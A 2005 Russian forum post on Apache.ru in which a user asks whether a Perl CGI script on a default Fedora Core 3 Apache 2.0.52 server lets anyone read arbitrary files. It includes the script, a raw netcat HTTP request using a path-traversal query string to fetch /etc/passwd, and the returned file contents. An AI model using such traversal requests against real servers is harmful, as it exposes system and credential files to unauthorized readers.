 |
|
Apache.RU - Webboard Вернуться Уязвимость в Apache 2? (Gimly) 11/01 - 13:50:17From: Gimly - 11/01 - 13:50:17 Subject:Уязвимость в Apache 2? ----------------- Свежепоставил апачу из FedoraCore3 httpd-2.0.52-3.i386.rpm Apache/2.0.52 (Fedora) Конфиги по дефолту.. Есть скрипт: =cut /cgi-bin/some.cgi #!/usr/bin/perl -w print "Content: text/plain\n\n"; undef local $/; $_=<>; print "Readed: ",$_||"'undef'","\n"; =cut here Отлаживая непонятные сбои с приёмом содержания формы получил что такого вида скрипт позволяет читать любой файл начиная с рутовской директории.. Или я чего-то не так понимаю?? Кто-нибудь может это подтвердить? # nc localhost 80 POST /cgi-bin/some.cgi?../../../../../../etc/passwd HTTP/1.0 Сontent-Type: text/plain Content-Length: 17 I-Wanna-Read-This HTTP/1.1 200 OK Date: Mon, 10 Jan 2005 16:54:10 GMT Server: Apache/2.0.52 (Fedora) Content: text/plain Content-Length: 7961 Connection: close Content-Type: text/plain; charset=UTF-8 Readed: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ... [Это сообщение - спам!] Последние сообщения из форума 16600 |
| Copyright Apache.ru © 1999-2017, All Rights Reserved | Разработка сайта: Inside.ru | ||
| РЕКЛАМА НА САЙТЕ: | | |||